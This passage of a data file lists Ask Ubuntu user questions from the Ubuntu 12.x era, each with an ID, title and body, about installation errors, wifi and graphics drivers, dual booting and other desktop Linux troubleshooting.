) i/o ports : 0x18c0-0x18ff ( rw ) memory range : 0xb0040800-0xb00409ff ( rw , non-prefetchable ) memory range : 0xb0040400-0xb00404ff ( rw , non-prefetchable ) irq : 17 ( no events ) module alias : `` pci : v00008086d0000266esv000010f7sd00008346bc04sc01i00 '' config status : cfg=new , avail=yes , need=no , active=unknown
226880	libetpan15 not installable when trying to install cairo dock	when adding cairo dock to ubuntu 12.04 , i get this message telling me i need a dependency . what do i do now to proceed with the install ? the following packages have unmet dependencies : cairo-dock-plug-ins : depends : libetpan15 ( > = 1.0 ) but it is not installable e : unable to correct problems , you have held broken packages . http : //paste.ubuntu.com/1419516/
226882	automated package build service	iâ´m using bacula for backuping my servers and clients , but the versions of bacula in the official repository are very old . so i compiled and installed all the components by myself . but that was very much work and it is also very much work when i want to update the components . is there a possibility for an automated build service that creates new packages when a new update of bacula realeases ? ( maybe in combination with git ) and how can i deploy the created packages with a foreign source to my servers and clients ? greetings nico
226884	how do i use a different drive as an installation location for steam ?	i recently got an invitation for steam . i want to download games but my ssd drive which i have ubuntu will not be enough . how can i install steam on a different hard drive ? i went into the `` steam library folders '' but i ca n't delete the original folder so steam can install on that drive . i have also tried to change the place but it is again on the down side :
226888	which filesystem should i use ?	i recently formatted my drive and now it appears as unallocated space in gparted . i want to use the drive for all my files , steam and game installation , to keep my ssd as empty as possible . what filesystem type should i use ?
226889	ssd caching ( e.g . asus p9x79 ws ) ‒ possible on ubuntu ?	some motherboards such as asus p9x79 ws support something called “asus ssd caching” . you can connect 1 hdd and 1 ssd to 2 designated sata ports , and iuuc , you can have a setup in which the motherboard will automatically cache ( on the ssd ) the most often used data stored on the hdd . it allows you to take advantage of the ssd speed and hdd capacity at the same time . i saw a presentation on youtube , in which they show how to set it up using a program running on windows . i 'm curious if this is really a hardware solution ( can be used on linux ) , or is it partially in software ? if it were just hardware , you could install windows , run the utility to set up ssd caching , and then install ubuntu , benefiting from the caching setup ? ( also , if it 's a hardware solution , why not set it up in right in the bios ? )
226893	bridge a connection and keep same ip and subnet	i have googled this for a while now but am not able to find answer to this question . i have my xbox bridged to my ubuntu pc . everything works , maybe just gives an nat error now and then . i want to be able to system link or share files from my computer . my setup is a wireless dongle conected to the ubuntu pc sharing the connecting through network-manager . my routers ip adress is set up as 192.168.1.1 with a subnet of 255.255.255.0 .
226894	additional drivers page shows nothing at all . ( not an nvidia problem )	i just reinstalled ubuntu 12.10 because before the additional drivers page showed absolutely nothing . during the new install , i made sure to click install 3rd party software ( i had n't clicked this last time and thought that might be the problem ) . however , when i was trying to connect to my wifi it did n't work ( because of my router only allowing 5 people on at a time ) , so i said do n't connect now . i planned to connect later and install the 3rd party software ( what i assume contains the list for proprietary drivers ) . is there any way to get my list of `` additional drivers '' to show something ? i thought maybe i could install updates and get it to work ( but that did n't work last time.. but last time i also had n't checked install 3rd party software.. ) . i do n't want to install updates if it wo n't work because my internet is pretty slow . also , i have it set to check for updates once a day , but if updating is the solution then how do i choose to check for updates now instead of waiting for later ? if doing another reinstall of ubuntu with wifi working is the solution then i 'll be more than happy to do that . someone please point me in the right direction ! thanks edit1 : i figured out how to check for updates immediately . i went to the top left on the unity taskbar and clicked the dash home icon . typed in `` software '' and `` software updater '' popped up . that lets you install software updates immediately . also , when i looked into ubuntu 's software update settings , the box for installing proprietary drivers was checked , so hopefully this update will also get me the list of drivers . i 'll edit again when the update is finished . edit2 : the updates have finished installing and i restarted my computer , but there are still no options listed in the additional drivers menu . does anyone know what i can do to see some optional drivers ? i have an ati hd 4200 in my laptop that i would really like the graphics drivers for .
226896	realtek 8188ce stops working after 2minutes	i am using ubuntu 12.10 on an hp dm4-2191us via wubi with the realtek 8188ce wifi adapter . everything works very well with the exception of the wifi . i have used wicd and it did n't worked at all so i went back to network manager with variable success . it works for 30 min - 2 min before i have to reconnect to get it to work again . i would really like to use ubuntu ( it is a better platform in my opinion ) but no wifi could really be a deal breaker .
226897	ubuntu network remote accounts	can i make an ubuntu network and have users be able to access accounts on multiple machines .
226905	each time after sudo apt-get install process this little failure-message ?	here is sudo apt-get install ending now with : trigger for initramfs-tools are processing ... update-initramfs : generating /boot/initrd.img-3.5.0-19-generic ... then here comes this : failure while processing : postfix e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what shall i do to iron this in 12.10 ?
226906	how to upgrade ubuntu unsupported 10.10 to 11.04 , then ultimately to 12.10	i am trying to upgrade from 10.10 to 11.04 . i have been getting these errors . first one- third party sources disabled some third party entries in your sources.list were disabled . you can re-enable them after the upgrade with the 'software-properties ' tool or your package manager . second one- error during update a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/source/sources.gz 404 not found , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/binary-i386/packages.gz 404 not found , e : some index files failed to download , they have been ignored , or old ones used instead .
226914	lubuntu 12.10 the add button still not active	i cant seem to add vpn from my network connections . this similar post does n't help me since i ca n't connect to the internet with my netbook to fetch the installation . any ideas on how to fix this without the help of internet connection ?
226915	wine wo n't follow symbolic links	i ca n't get wine to follow some symbolic links i have in my home folder or in applications . is there a way to enable this ? this is on wine-1.5.18 . edit : just in case it helps , i 'm trying to use a symbolic link to share the save data from my fallout 1 , between my netbook and my desktop via dropbox . edit 2 : apparently , there was a option in the wine config file in the past , but i ca n't find it in the new registry . anyone have any idea ?
226918	undefined reference to `xshmqueryversion '	i am try to compile a simple codebase that use simple x11 functions but it gives error at compile : ( .text+0x1c ) : undefined reference to `xshmqueryversion' i used the xshmqueryversion function in my code , i compiled it with g++ myprogram.c -o program what am i missing ?
226922	sound from dvd very low in mplayer , other sounds normal	seems to be related to mplayer playback only . vlc sound levels are fine . if i play a local or youtube video then sound is normal , much louder than the dvd . the dvd has dolby digital 5.1 . i 've connected my amp through the headphone jack and the line out jack , both similar .
226928	ran `` software update '' , and wireless is gone	i installed ubuntu 12.10 amd64 on a macbook 3,1 . wireless was working until i ran a `` software update '' , and now i am without wireless . i have an internal broadcom network adaptor ( bcm4321 ) .
226929	can i set up a hostname alias that is only active in a specific network ?	i have a small arm box running owncloud in my house , and a domain bound to my dsl router with dynamic dns . this works well as i can configure the owncloud client to use the domain name , which works both in the house and when i 'm on the road . however , at home i would like to let my laptop and my server talk to each other directly on the local network , rather than as if they were talking over the internet ( including dns resolution for my domain name , routing all traffic through the dsl machinery etc. ) . i know that i can set a hostname alias for my domain in /etc/hosts - the problem is that i want this alias to only be active when i 'm in the home network , while in all other cases dns resolution should be used as normal . is this possible ?
226930	where can i find the names of the various settings dialogs ?	i 'm using xmonad , so i ca n't see the regular ubuntu menu to get to the tools in the settings and preferences menus . i have to invoke them by name . does anyone have a list of the names of these tools ? ( so that they could be started from the command line ) in particular , i need the network proxy settings tool .
226938	can i use usa ip without vpn or proxy ?	can i use usa ip without vpn or proxy ? i 'm overseas now and i need to use my back home ip , but i do n't wan na use any vpn or proxy stuffs ? anyone got an idea about how to link my ip from back home to my computer here ? i know this is a stupid question but i just want to know how i can use a usa ip from another country without vpn or other proxy stuffs . helps ! thanks in advance.`
226939	re-encode video files	i have lots of video files and am running out of storage space fast . without affecting the quality too much , what is an easy quick way to re-encode these files to smaller files ? the original files are mp4 files from my camcorder .
226941	function keys and hot are switched	i recently got a new laptop and installed 12.10 on it . i noticed right away that the `` hot keys '' on the f keys did n't always do what was pictured and also i noticed that the `` hot keys '' and the function keys were reversed . e.g . to close a window i have to hit alt-fn-f2 instead of just alt-f2 . this is pretty annoying because i 've been using the same keyboard shortcuts for years and i do n't really want to have to re-learn them . i would also like to switch what the hot keys do , for example the f3 key is pictured as increase screen brightness but it really puts the computer to sleep . i would like to change this back to increase the brightness i looked in keyboard shortcuts settings but these options are not in there . i also downloaded gconf-editor but was unable to find where to change the shortcuts on it . ( they were n't at apps \ metacity \ keybinding_commands like others described ) any help would be greatly appreciated
226945	some lenses not working in 12.04	i have just started experimenting with extra lens in unity . i installed some that i found listed in an askubuntu question . some of them do n't seem to work . the `` cooking '' lens is supposed to show recipes , but i just get a blank result - nothing is found . i have another lens which i assume is the youtube lens i installed , that sits and searches forever when i switch to it , and even type a search into it .
226948	**plz help . skype wont install**	whenever i try to install it it says , some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin but it is not installable e : unable to correct problems , you have held broken packages . i have tried stuff people told me to do and i still can not get it to work .
226952	ubuntu 12.10 wireless on macbook pro late 2011 no internet access	is there a way i can download all the dependencies of b43-fwcutter_011-1_i386.deb and broadcom-wl-5.100.138 that i download from mac os x to use with ubuntu . the late 2011 mbp does n't have a ethernet port so i 'm just trying to get the wireless to work in the ubuntu part .
226953	documents queue to shared printer but wo n't print	i have an hp desk jet 3650 printer on a windows 7 laptop , which is shared with my ubuntu 12.04 desktop . the ubuntu machine can see the printer and sends files to it , but the files only queue and wo n't print .
226954	ubuntu 12.10 quantal quetzal and amd 12.11 beta driver	i 'm using a quantal amdx64 install and a xfx radeon hd5850 video card . i first enabled restricted drivers through additional drivers , but it resulted in breaking unity and compiz ( i can only see my wallpaper and shortcuts . but the terminal still works and nautilus too , however , without close/maximize/minimize and slower ) . then i uninstalled it and everything went back to normal . then i installed it via terminal ( 12.10 version ) , and the result was the same . then i downloaded it via ati 's web site ( 12.11 beta ) and installed the .run file using the terminal , but the result was yet again the same . then i went to the terminal and entered these commands : aticonfig -- help used the command it said it should be used to set the card for the first time aticonfig -- initial compiz -- replace - it gave me a driver error , the opengl does n't work unity - same thing and i also got the `` amd testing only '' watermark . side notes : my ubuntu is installed on a ext4 partition with 60gb , and i dual boot with windows 7 ( at least for now ) . my internet is a 50kbps 3g-ish , so downloading even small files is a pain , let alone a video driver . i would rather not reinstall the o.s. , it was a herculean task to download everything i had in there , and i have very little free disk space for backups . i 'm still new to ubuntu ( i know some basic commands ) , and i do n't know how to debug , so please , be patient xd . thanks in advance . if you need any info , just ask ( and explain how to get it xd ) . update i just installed the restricted-updates driver too , but the result was the same . now i found the xorg.2.log , but the site does n't let me post it here , so i 'll have to ask me to look for specific parts of it .
226955	why i cant access to the partition i made for ubuntu while instaling ?	i downloaded the .iso file of ubuntu 12.04 , burned it down to a cd , ran it , tested ubuntu , chose install ubuntu along windows 7 ( my current os ) and after a while it said it was done , and after restarting i could use ubuntu . after restart windows 7 ran , although i read i could chose which os to run . i checked on windows and yes , the partition type ext4 was there , but its just labeled as primary partition with no other function whatsoever . i restarted and accessed to the boot menu and the partition was not there .
226957	problems updating and re-installing vlc in ubuntu 11.10	i ca n't seem to fix or update , upgrade vlc at all ; this is what i get when trying to install , i had vlc before , but was not working properly so i uninstalled it ; then i tried to install it again to have the full properties . so now i can not install as i get this message , i have tried everything and have checked with your site for additional info ; any suggestions to someone who is new to ubuntu and linux altogether ? # package dependencies can not be resolved # this error could be caused by required additional software packages which are missing or not installable . # furthermore there could be a conflict between software packages which are not allowed to be installed at the same time # the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 1.1.12-2~oneiric1 ) but 2.1.0~~git20121022+r2158-0~r88~oneiric1 is to be installed depends : libaa1 ( > = 1.4p5 ) but 1.4p5-38build1 is to be installed depends : libavcodec-extra-53 ( > = 4:0.7-1 ) but 4:0.7.6ubuntu0.11.10.1+medibuntu1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7-1 ) but 4:0.7.6ubuntu0.11.10.1+medibuntu1 is to be installed depends : libc6 ( > = 2.8 ) but 2.13-20ubuntu5.3 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.4-2ubuntu1.2 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.1-9ubuntu3 is to be installed depends : libqtcore4 ( > = 4:4.7.0~beta1 ) but 4:4.7.4-0ubuntu8.2 is to be installed depends : libqtgui4 ( > = 4:4.5.3 ) but 4:4.7.4-0ubuntu8.2 is to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but 1.2.10-2.1 is to be installed depends : libsdl1.2debian ( > = 1.2.10-1 ) but 1.2.14-6.1ubuntu4 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.1-9ubuntu3 is to be installed depends : libxcb-xv0 ( > = 1.2 ) but 1.7-3 is to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu3 is to be installed`
226959	nitro tasks not generating `` todo.txt ''	i have started using nitro tasks and while current version 1.5 should feature automatic generation of `` todo.txt '' when syncing with ubuntu one , i do n't see this file . it should be found in the ubuntu one nitro folder , but this only holds a .json file . anyone else experienced this ? how do you force nitro task to create the `` todo.txt '' file ?
226962	ubuntu 12.10 usb graphics compatibility	i was looking at solutions to connect 2 monitors to 1 usb port and found these : 1 ) http : //www.targus.com/us/productdetail.aspx ? regionid=7 & sku=aca039us 2 ) http : //www.startech.com/av/usb-video-adapters/usb-3-to-hdmi-dvi-external-video-card~usb32hddvii these are both displaylink . i have heard that displaylink docks do not work but adapters do . since these have 2 outputs , i was n't sure if they are compatible with ubuntu 12.10 . any help ? if these wo n't work what will ? thanks
226965	hi , i just bought an asus f55a but i can not enter bios ?	hi everybody i just bought an asus f55a but i can not enter in bios or boot the linux usb before startup as i did before with my old asus k50c by pressing f2 for entering bios and ctrl+esc+f1 to choose what to boot first the usb or the hard drive , can somebody help me please ? ? ? ?
226969	how do i create a multiboot environment using lvm for your *buntu operating systems on a gpt formatted system drive , in a uefi based system ?	my reason for using lvm is that i reinstall , upgrade and generally mess around with my os installs so much that i have found that lvm gives me fantastic flexibility in moving , expanding , cloning and backing up my os partitions at my leasure without the risks assosiated with other partitioning methods . it does , however , make multibooting your oses a little complicated and unpredictable at times , especially on newer hardware , where the process gains another level of complexity . what i 'm talking about are the new uefi ( as opposed to bios ) motherboards , which allow you use the full potential of , and to boot from , 3tb+ hard drives ( when formatted in gpt as opposed to mbr ) . things can get incredibly complicated and messed up because each time that you install a new os on your machine , it will overwrite the efi bootloader ( .efi ) files of your previous install and you will end up with a series of broken entries in your efi `` bios '' bootlist and a load of pretty much redundant grub bootloaders scattered about your partitions . this offends me on so many levels , not least of which aesthetically .
226970	give permissions for packages downloaded from the internet and lock them in ubuntu 12.04 sidebar	i downloaded netbeans ide and eclipse ide from the internet and installed then . well , the eclipse ide works fine , but when i execute netbeans ide directly from the shortcut , without sudo permission , it shows me lots of error telling that some files are read only . this does not happens when i 'm using the terminal to call the .sh script with sudo permissions . another thing that bothers me : how can i fix my shortcuts in the ubuntu 's 12.04 sidebar ? i want to combine a launcher with enough permissions to do everything it 's needing and fix it in my sidebar . is it possible ?
226971	when i start my laptop i have a choice of three ubuntu operating systems how can i remove this ?	only 1 works and the other 2 don't.i want to get rid of these other 2 , also the ubuntu i am running on now i want it to be the only operating system as i also got windows 7 . is there anyway i can do this with using a cd .
226973	what version of adobe flash player should i download for the latest linux ?	yum for linux target for other linux rpm for other linux apt for ubuntu 10/04+ i do n't have a clue what is going on
226975	ubuntu 12.10 picasa installation	i 've used script from how would i install picasa 3.9 ? : 1 ) install wine and winetricks : sudo apt-get install wine winetricks and sudo apt-get install wine winetricks & & cd ~/ & & wget http : //dl.google.com/picasa `` /picasa39-setup.exe & & wine ~/picasa39-setup.exe & & env winearch=win32 wineprefix=~/.tmp winetricks ie6 & & cp -r ~/.tmp/* ~/.wine/ but stack on configuring ttf-mscorefonts-installer ├─────────────────┐ │ │ │ truetype core fonts for the web eula │ │ end-user license agreement for microsoft software │ │ important-read carefully : this microsoft end-user license agreement │ ( `` eula '' ) is a legal agreement between you ( either an individual or a │ single entity ) and microsoft corporation for the microsoft software │ accompanying this eula , which includes computer software and may include │ associated media , printed materials , and `` on-line '' or electronic │ documentation ( `` software product '' or `` software '' ) . by exercising your │ rights to make and use copies of the software product , you agree to be │ bound by the terms of this eula . if you do not agree to the terms of │ this eula , you may not use the software product . │ │ │ │ │ └───────────────────────────────────────────────────────────────────────────┘ it has happen under both scripts dont move nowhere . does somebody know how to handle this issue ? thanks in advance nick
226976	do i need dnsmasq ?	when i nmap localhost get this : 53/tcp open domain dnsmasq 2.59 what is it and do i really need it ? i tried to remove it with sudo apt-get remove dnsmasq-base but it said if i would continue it will remove network-manager and network-manager-gnome too . so do i need it for network-manager and network-manager-gnome or if i do n't can i just remove it because i do n't want to have it listen on port 53
226979	update manager ubuntu 12.10 ( 1 ) failed to fetch cdrom : ( 2 ) failed to fetch http : //ppa.launchpad.net/jonls/	please guide how to solve problem described below : error received while running update manager in ubuntu 12.10 : w : failed to fetch cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) /dists/oneiric/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) /dists/oneiric/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch http : //ppa.launchpad.net/jonls/redshift-ppa/ubuntu/dists/quantal/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/jonls/redshift-ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . copy from terminal when run sudo apt-get update & & sudo apt-get upgrade : nnnnnnnnnn : ~ $ sudo apt-get update & & sudo apt-get upgrade [ sudo ] password for neeta : ign cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) oneiric inrelease ign cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) oneiric release.gpg ign cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) oneiric release err cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) oneiric/main i386 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) oneiric/restricted i386 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms ign cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) oneiric/main translation-en_in ign cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) oneiric/main translation-en ign cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) oneiric/restricted translation-en_in ign cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) oneiric/restricted translation-en ign http : //dl.google.com stable inrelease ign http : //in.archive.ubuntu.com quantal inrelease ign http : //security.ubuntu.com quantal-security inrelease ign http : //extras.ubuntu.com oneiric inrelease ign http : //deb.opera.com stable inrelease hit http : //dl.google.com stable release.gpg ign http : //in.archive.ubuntu.com quantal-updates inrelease hit http : //security.ubuntu.com quantal-security release.gpg ign http : //archive.canonical.com oneiric inrelease ign http : //ppa.launchpad.net quantal inrelease hit http : //extras.ubuntu.com oneiric release.gpg hit http : //dl.google.com stable release ign http : //deb.opera.com stable inrelease ign http : //in.archive.ubuntu.com quantal-backports inrelease hit http : //security.ubuntu.com quantal-security release ign http : //archive.canonical.com quantal inrelease ign http : //ppa.launchpad.net natty inrelease hit http : //extras.ubuntu.com oneiric release hit http : //dl.google.com stable/main i386 packages hit http : //deb.opera.com stable release.gpg hit http : //in.archive.ubuntu.com quantal release.gpg hit http : //security.ubuntu.com quantal-security/main sources hit http : //archive.canonical.com oneiric release.gpg ign http : //ppa.launchpad.net quantal release.gpg hit http : //extras.ubuntu.com oneiric/main sources hit http : //in.archive.ubuntu.com quantal-updates release.gpg hit http : //deb.opera.com stable release.gpg hit http : //security.ubuntu.com quantal-security/restricted sources hit http : //ppa.launchpad.net natty release.gpg hit http : //extras.ubuntu.com oneiric/main i386 packages hit http : //in.archive.ubuntu.com quantal-backports release.gpg hit http : //deb.opera.com stable release hit http : //security.ubuntu.com quantal-security/universe sources ign http : //ppa.launchpad.net quantal release hit http : //in.archive.ubuntu.com quantal release hit http : //security.ubuntu.com quantal-security/multiverse sources hit http : //ppa.launchpad.net natty release hit http : //deb.opera.com stable release hit http : //archive.canonical.com quantal release.gpg hit http : //in.archive.ubuntu.com quantal-updates release hit http : //security.ubuntu.com quantal-security/main i386 packages hit http : //deb.opera.com stable/non-free i386 packages hit http : //archive.canonical.com oneiric release hit http : //in.archive.ubuntu.com quantal-backports release hit http : //security.ubuntu.com quantal-security/restricted i386 packages hit http : //archive.canonical.com quantal release hit http : //in.archive.ubuntu.com quantal/main sources hit http : //security.ubuntu.com quantal-security/universe i386 packages hit http : //archive.canonical.com oneiric/partner sources hit http : //in.archive.ubuntu.com quantal/restricted sources hit http : //security.ubuntu.com quantal-security/multiverse i386 packages hit http : //archive.canonical.com oneiric/partner i386 packages hit http : //in.archive.ubuntu.com quantal/universe sources hit http : //deb.opera.com stable/non-free i386 packages hit http : //ppa.launchpad.net natty/main sources ign http : //dl.google.com stable/main translation-en_in hit http : //in.archive.ubuntu.com quantal/multiverse sources hit http : //security.ubuntu.com quantal-security/main translation-en hit http : //ppa.launchpad.net natty/main i386 packages ign http : //dl.google.com stable/main translation-en hit http : //in.archive.ubuntu.com quantal/main i386 packages hit http : //archive.canonical.com quantal/partner i386 packages hit http : //in.archive.ubuntu.com quantal/restricted i386 packages ign http : //extras.ubuntu.com oneiric/main translation-en_in hit http : //security.ubuntu.com quantal-security/multiverse translation-en hit http : //in.archive.ubuntu.com quantal/universe i386 packages ign http : //extras.ubuntu.com oneiric/main translation-en hit http : //in.archive.ubuntu.com quantal/multiverse i386 packages hit http : //security.ubuntu.com quantal-security/restricted translation-en hit http : //in.archive.ubuntu.com quantal/main translation-en hit http : //security.ubuntu.com quantal-security/universe translation-en hit http : //in.archive.ubuntu.com quantal/multiverse translation-en hit http : //in.archive.ubuntu.com quantal/restricted translation-en hit http : //in.archive.ubuntu.com quantal/universe translation-en hit http : //in.archive.ubuntu.com quantal-updates/main sources hit http : //in.archive.ubuntu.com quantal-updates/restricted sources hit http : //in.archive.ubuntu.com quantal-updates/universe sources hit http : //in.archive.ubuntu.com quantal-updates/multiverse sources hit http : //in.archive.ubuntu.com quantal-updates/main i386 packages ign http : //archive.canonical.com oneiric/partner translation-en_in ign http : //deb.opera.com stable/non-free translation-en_in hit http : //in.archive.ubuntu.com quantal-updates/restricted i386 packages ign http : //archive.canonical.com oneiric/partner translation-en ign http : //deb.opera.com stable/non-free translation-en hit http : //in.archive.ubuntu.com quantal-updates/universe i386 packages ign http : //archive.canonical.com quantal/partner translation-en_in ign http : //deb.opera.com stable/non-free translation-en_in ign http : //security.ubuntu.com quantal-security/main translation-en_in hit http : //in.archive.ubuntu.com quantal-updates/multiverse i386 packages ign http : //archive.canonical.com quantal/partner translation-en ign http : //security.ubuntu.com quantal-security/multiverse translation-en_in ign http : //deb.opera.com stable/non-free translation-en ign http : //security.ubuntu.com quantal-security/restricted translation-en_in err http : //ppa.launchpad.net quantal/main sources 404 not found ign http : //security.ubuntu.com quantal-security/universe translation-en_in err http : //ppa.launchpad.net quantal/main i386 packages 404 not found hit http : //in.archive.ubuntu.com quantal-updates/main translation-en ign http : //ppa.launchpad.net quantal/main translation-en_in ign http : //ppa.launchpad.net quantal/main translation-en hit http : //in.archive.ubuntu.com quantal-updates/multiverse translation-en ign http : //ppa.launchpad.net natty/main translation-en_in hit http : //in.archive.ubuntu.com quantal-updates/restricted translation-en ign http : //ppa.launchpad.net natty/main translation-en hit http : //in.archive.ubuntu.com quantal-updates/universe translation-en hit http : //in.archive.ubuntu.com quantal-backports/main sources hit http : //in.archive.ubuntu.com quantal-backports/restricted sources hit http : //in.archive.ubuntu.com quantal-backports/universe sources hit http : //in.archive.ubuntu.com quantal-backports/multiverse sources hit http : //in.archive.ubuntu.com quantal-backports/main i386 packages hit http : //in.archive.ubuntu.com quantal-backports/restricted i386 packages hit http : //in.archive.ubuntu.com quantal-backports/universe i386 packages hit http : //in.archive.ubuntu.com quantal-backports/multiverse i386 packages hit http : //in.archive.ubuntu.com quantal-backports/main translation-en hit http : //in.archive.ubuntu.com quantal-backports/multiverse translation-en hit http : //in.archive.ubuntu.com quantal-backports/restricted translation-en hit http : //in.archive.ubuntu.com quantal-backports/universe translation-en ign http : //in.archive.ubuntu.com quantal/main translation-en_in ign http : //in.archive.ubuntu.com quantal/multiverse translation-en_in ign http : //in.archive.ubuntu.com quantal/restricted translation-en_in ign http : //in.archive.ubuntu.com quantal/universe translation-en_in ign http : //in.archive.ubuntu.com quantal-updates/main translation-en_in ign http : //in.archive.ubuntu.com quantal-updates/multiverse translation-en_in ign http : //in.archive.ubuntu.com quantal-updates/restricted translation-en_in ign http : //in.archive.ubuntu.com quantal-updates/universe translation-en_in ign http : //in.archive.ubuntu.com quantal-backports/main translation-en_in ign http : //in.archive.ubuntu.com quantal-backports/multiverse translation-en_in ign http : //in.archive.ubuntu.com quantal-backports/restricted translation-en_in ign http : //in.archive.ubuntu.com quantal-backports/universe translation-en_in w : failed to fetch cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) /dists/oneiric/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) /dists/oneiric/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch http : //ppa.launchpad.net/jonls/redshift-ppa/ubuntu/dists/quantal/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/jonls/redshift-ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
226980	how to reinstall programm without removing it ? all programms ? resetting configs ?	how to reinstall programm without removing it ? all programms ? resetting configs ?
226985	driver / module brcm80211 missing	i 'm user of xubuntu 12.04 on an aod270 netbook . it has a built-in chipset for the wifi connection broadcom 4313 14a4:4727 , which i 'm trying to get to work in both normal and monitor mode . i got it to work at once , but with a bug ( the channel fixed on -1 ) . while i was searching for the fix trying different solutions , it stopped working . so , bottom line , i had the chipset working with the right driver - but with a bug - i broke it ; and now i 'm trying to get all working again . when i 'm trying to load module brcm80211 ; with the following command : sudo modprobe brcm80211 the terminal retrieves this message : fatal : module brcm80211 not found . i fear i deleted the module while trying to fix the -1 bug . how can i fix this ? lspci and lsmod information are attached next . http : //pastebin.com/zfyx17dd http : //pastebin.com/yafburzw i have already read broadcom brcm80211 installation from source
226986	no language support : new ubuntu 12.10 install	when i `` install language support '' a new window opens but applying changes does not move , nothing happens all i can do is cancel tried it over and over and over and over ... i tried it again and noticed that it says `` waiting '' what is it waiting for ?
226989	how to copy music from ios5 device	besides running windows on virtual box , is there a native linux way to do this yet ? ifuse ? libimobiledevices ?
226994	converting celsius processor temperature to fahrenheit	i 'm editing a conky theme . i would like it to output the processor temperatures in degrees fahrenheit instead of celsius . in the ~/.conkyrc file , the command sensors | grep 'core 0 ' | cut -c18-19 is used to find the temperature in celsius for the first processor core . i want to use bc to compute this ( give it outputvalue*9/5+32 ) . problem is , bc wants just absolute values , and i see no way to pass it program output . if i try to use something like temp= $ ( sensors | grep 'core 0 ' | cut -c18-19 ) & echo 'temp*9/5+32 ' | bc , it ends up giving me 32 because it registers `` temp '' as a 0 .
226997	trying to use amd fglrx driver , unity does not work ubuntu 12.10	i just installed ubuntu on my samsung series 3 laptop ( np305e7a-a02us ) with an amd a6-3420m with radeon hd 6520g graphics , and i am trying to install the flgrx experimental driver . however , i can not find the experimental driver , and when i use the stable version of that driver , the top bar does not show and the unity launcher does not show up . on top of that , when i try to install the amd drivers from the amd site , it gives me the error one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with the -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended . see /usr/share/ati/fglrx-install.log for more details . i checked the directory and sure enough , it said supported adapter detected . check if system has the tools required for installation . fglrx installation requires that the system have kernel headers . /lib/modules/3.5.0-20-generic/build/include/linux/version.h can not be found on this system . one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended . i have no idea what this is and i need to fix it , as i was accepted into the steam for linux beta , and they recommended this amd driver . any help is greatly appreciated . thanks so much !
227001	why my nfs server can run without portmap ?	i have learned from this linux nfs-howto that in order to setup a nfs server , the daemon portmap must be run first . but why i can not find any portmap process using ps aux | grep . my system is ubuntu 12.10 and i set up my nfs server under the instruction from settingupnfshowto .
227004	lines have tops of characters cut off in evince	my bank statements are pdf files but are unreadable in 12.10 with evince . they are fine with adobe reader . they are fine in evince on fedora so it has to be something with evince and ubuntu . any help would be appreciated . i have looked at anything postscript related and ca n't figure it out .
227005	how do i loop a movie infinitely on another monitor ?	i want to loop a video infinitely in another monitor . how do i do this ?
227007	how do i make my computer boot the ubuntu partition ?	i have just installed ubuntu on my pc so i have a windows and a ubuntu partition . when i turn my computer on , it automatically boots to windows . how can i make a menu pop up that lets me select the partition i want to go to ? i am new to this stuff
